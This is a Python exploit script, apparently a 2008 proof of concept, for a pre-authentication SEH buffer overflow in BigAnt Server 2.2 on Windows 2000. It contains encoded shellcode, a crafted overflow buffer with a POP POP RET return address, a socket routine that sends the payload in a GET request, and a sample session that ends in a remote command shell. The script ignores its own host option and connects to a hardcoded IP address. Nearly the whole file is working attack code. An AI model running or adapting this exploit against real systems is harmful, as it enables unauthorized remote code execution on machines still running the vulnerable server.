#!/usr/bin/python ############################################################################### # BigAnt Server Ver 2.2 PreAuth Remote SEH Overflow (0day) # Matteo Memelli aka ryujin # www.be4mind.com - www.gray-world.net # 04/13/2008 # Tested on Windows 2000 Sp4 English # Vulnerable process is AntServer.exe # Offset for SEH overwrite is 954 Bytes # #------------------------------------------------------------------------------ # muts you gave me the wrong pill! it's your fault!!! # I wanna go back to the matrix #------------------------------------------------------------------------------ # # bt ~ # ./antserver_exploit.py -H 192.168.1.195 -P 6080 # [+] Connecting to host... # [+] Overflowing the buffer... # [+] Done! Check your shell on 192.168.1.195:6080 # bt ~ # nc -vv 192.168.1.195 4444 # 192.168.1.195: inverse host lookup failed: Unknown host # (UNKNOWN) [192.168.1.195] 4444 (krb524) open # Microsoft Windows 2000 [Version 5.00.2195] # (C) Copyright 1985-2000 Microsoft Corp. # # C:\WINNT\system32> # ############################################################################### from socket import * from optparse import OptionParser import sys print "[*********************************************************************]" print "[* *]" print "[* BigAnt Server PreAuth Remote SEH Overflow (0day) *]" print "[* Discovered and Coded By *]" print "[* Matteo Memelli *]" print "[* (ryujin) *]" print "[* www.be4mind.com - www.gray-world.net *]" print "[* *]" print "[*********************************************************************]" usage = "%prog -H TARGET_HOST -P TARGET_PORT" parser = OptionParser(usage=usage) parser.add_option("-H", "--target_host", type="string", action="store", dest="HOST", help="Target Host") parser.add_option("-P", "--target_port", type="int", action="store", dest="PORT", help="Target Port") (options, args) = parser.parse_args() HOST = options.HOST PORT = options.PORT if not (HOST and PORT): parser.print_help() sys.exit() # Tried with SEH/THREAD/PROCESS but server crashes anyway # [*] x86/alpha_mixed succeeded, final size 698 SEH shellcode = ( "\x89\xe1\xda\xc0\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49" "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" "\x4b\x4c\x43\x5a\x4a\x4b\x50\x4d\x4b\x58\x4a\x59\x4b\x4f\x4b" "\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x47\x54\x47\x54\x4c\x4b" "\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x43\x48\x45\x51\x4a" "\x4f\x4c\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x51\x30\x45\x51" "\x4a\x4b\x47\x39\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46" "\x51\x49\x50\x4a\x39\x4e\x4c\x4d\x54\x49\x50\x42\x54\x44\x47" "\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47" "\x4b\x46\x34\x47\x54\x47\x58\x42\x55\x4b\x55\x4c\x4b\x51\x4f" "\x46\x44\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c" "\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b" "\x4d\x59\x42\x4c\x47\x54\x45\x4c\x45\x31\x49\x53\x50\x31\x49" "\x4b\x42\x44\x4c\x4b\x47\x33\x50\x30\x4c\x4b\x47\x30\x44\x4c" "\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x43\x38\x51" "\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f" "\x4e\x36\x42\x46\x51\x43\x42\x46\x43\x58\x47\x43\x50\x32\x42" "\x48\x42\x57\x43\x43\x50\x32\x51\x4f\x51\x44\x4b\x4f\x4e\x30" "\x43\x58\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x4e" "\x36\x51\x4f\x4d\x59\x4d\x35\x45\x36\x4b\x31\x4a\x4d\x45\x58" "\x43\x32\x50\x55\x42\x4a\x44\x42\x4b\x4f\x48\x50\x43\x58\x49" "\x49\x45\x59\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x48\x56\x46\x33" "\x46\x33\x50\x53\x50\x53\x46\x33\x47\x33\x46\x33\x51\x53\x46" "\x33\x4b\x4f\x4e\x30\x45\x36\x42\x48\x42\x31\x51\x4c\x45\x36" "\x50\x53\x4b\x39\x4d\x31\x4c\x55\x42\x48\x49\x34\x44\x5a\x44" "\x30\x49\x57\x50\x57\x4b\x4f\x49\x46\x42\x4a\x42\x30\x46\x31" "\x51\x45\x4b\x4f\x48\x50\x43\x58\x4e\x44\x4e\x4d\x46\x4e\x4b" "\x59\x51\x47\x4b\x4f\x48\x56\x46\x33\x50\x55\x4b\x4f\x48\x50" "\x42\x48\x4a\x45\x47\x39\x4b\x36\x47\x39\x51\x47\x4b\x4f\x4e" "\x36\x46\x30\x46\x34\x46\x34\x50\x55\x4b\x4f\x4e\x30\x4a\x33" "\x43\x58\x4a\x47\x44\x39\x49\x56\x44\x39\x46\x37\x4b\x4f\x49" "\x46\x46\x35\x4b\x4f\x48\x50\x42\x46\x43\x5a\x42\x44\x45\x36" "\x42\x48\x45\x33\x42\x4d\x4c\x49\x4d\x35\x42\x4a\x50\x50\x46" "\x39\x47\x59\x48\x4c\x4d\x59\x4a\x47\x43\x5a\x51\x54\x4d\x59" "\x4a\x42\x46\x51\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x51\x52\x46" "\x4d\x4b\x4e\x50\x42\x46\x4c\x4d\x43\x4c\x4d\x42\x5a\x46\x58" "\x4e\x4b\x4e\x4b\x4e\x4b\x42\x48\x43\x42\x4b\x4e\x4e\x53\x42" "\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x48\x56\x51\x4b\x50\x57" "\x46\x32\x46\x31\x50\x51\x50\x51\x43\x5a\x43\x31\x46\x31\x50" "\x51\x51\x45\x50\x51\x4b\x4f\x4e\x30\x42\x48\x4e\x4d\x49\x49" "\x43\x35\x48\x4e\x50\x53\x4b\x4f\x49\x46\x43\x5a\x4b\x4f\x4b" "\x4f\x47\x47\x4b\x4f\x4e\x30\x4c\x4b\x51\x47\x4b\x4c\x4b\x33" "\x48\x44\x45\x34\x4b\x4f\x49\x46\x46\x32\x4b\x4f\x4e\x30\x45" "\x38\x4a\x50\x4c\x4a\x44\x44\x51\x4f\x51\x43\x4b\x4f\x48\x56" "\x4b\x4f\x48\x50\x44\x4a\x41\x41" ) # 77F8AEDC POP POP RET User32.dll Win 2000 Sp4 evilbuf = '\x90'*252 + shellcode + '\xeb\x06\x90\x90' + \ '\xDC\xAE\xF8\x77' + '\x90'*8 + '\xE9\x82\xFC\xFF\xFF' + \ 'C'*1225 print '[+] Connecting to host...' s = socket(AF_INET, SOCK_STREAM) s.connect(('192.168.1.195', 6080)) print '[+] Overflowing the buffer...' s.send('GET ' + evilbuf + "\n\n") s.close() print '[+] Done! Check your shell on %s:%d' % (HOST, PORT)